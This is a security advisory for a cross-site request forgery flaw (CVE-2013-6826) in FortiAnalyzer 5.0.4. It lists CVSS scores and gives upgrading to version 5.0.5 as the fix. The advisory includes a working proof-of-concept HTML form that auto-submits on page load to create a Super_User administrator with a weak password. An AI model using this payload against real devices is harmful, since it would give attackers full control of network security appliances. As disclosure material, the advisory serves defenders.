Fortianalyzer VM / Appliance 5.0.4 Cross Site Request Forgery

2013-11-13 / 2013-11-22
Credit: William Costa
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2013-6826
CWE: CWE-352


Ogólna skala CVSS: 6.8/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

Cert(R) no respond my email, not Fortinet has not given the credits. I. VULNERABILITY ------------------------- CSRF vulnerabilities in OS of fortianalyzer 5.0.4 II. BACKGROUND ------------------------- Fortinets industry-leading, Network Security Platforms deliver Next Generation Firewall (NGFW) security with exceptional throughput, ultra low latency, and multi-vector threat protection. III. DESCRIPTION ------------------------- Has been detected a CSRF vulnerability in FortiAnalyzer in /cgi-bin/module//sysmanager/admin/SYSAdminUserDialog" 5.0.4 , that allows the execution attackers to hijack the authentication of administrators for requests that modify settings or creation of user administrator in fortianalyzer, because this functions are not protected by CSRF-Tokens. IV. PROOF OF CONCEPT ------------------------- The application does not validate the parameter csrf_token /cgi-bin/module//sysmanager/admin/SYSAdminUserDialog. <html> <body onload="CSRF.submit();"> <html> <body onload="CSRF.submit();"> <form id="csrf" action="https://IP_Fortianalyzer/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog" method="post" name="CSRF"> <input name="userId" value="user.via.cfsr"> </input> <input name="type" value="0"> </input> <input name="rserver" value=""> </input> <input name="lserver" value=""> </input> <input name="subject" value=""> </input> <input name="cacerts" value="Fortinet_CA2"> </input> <input name="password" value="123456"> </input> <input name="password_updated" value="1"> </input> <input name="confirm_pwd" value="123456"> </input> <input name="confirm_pwd_updated" value="1"> </input> <input name="host_1" value="0.0.0.0/0.0.0.0"> </input> <input name="host_2" value="255.255.255.255/255.255.255.255"> </input> <input name="host_3" value="255.255.255.255/255.255.255.255"> </input> <input name="host_4" value="255.255.255.255/255.255.255.255"> </input> <input name="host_5" value="255.255.255.255/255.255.255.255"> </input> <input name="host_6" value="255.255.255.255/255.255.255.255"> </input> <input name="host_7" value="255.255.255.255/255.255.255.255"> </input> <input name="host_8" value="255.255.255.255/255.255.255.255"> </input> <input name="host_9" value="255.255.255.255/255.255.255.255"> </input> <input name="host_10" value="255.255.255.255/255.255.255.255"> </input> <input name="host6_1" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_2" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_3" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_4" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_5" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_6" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_7" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_8" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_9" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_10" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="profile" value="Super_User"> </input> <input name="alladomRDGrp" value="0"> </input> <input name="_adom" value=""> </input> <input name="allpackRDGrp" value="0"> </input> <input name="_adom" value=""> </input> <input name="allpackRDGrp" value="0"> </input> <input name="_pack" value=""> </input> <input name="desc" value=""> </input> <input name="showForce" value="0"> </input> <input name="numhosts" value="0"> </input> <input name="numhosts6" value="3"> </input> <input name="_comp_8" value="OK"> </input> <input name="actionevent" value="new"> </input> <input name="profileId" value=""> </input> <input name="mgt" value=""> </input> <input name="dashboard" value=""> </input> <input name="dashboardmodal" value=""> </input> <input name="csrf_token" value=""> </input> </form> </body> </html> V. BUSINESS IMPACT ------------------------- That allows the execution attackers to hijack the authentication of administrators for requests that modify settings or creation of user administrator in fortianalyzer and have access all function of box. VI. REQUIREMENTS ----------------------- An Attacker needs to know the IP of the device. An Administrator needs an authenticated connection to the device. VII. SYSTEMS AFFECTED ------------------------- Try Fortianalyzer VM or appliance v5.0.4 VIII. SOLUTION ------------------------- UpGrade for v5.0.5 POC https://vimeo.com/78776768 By William Costa william.costa@gmail.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top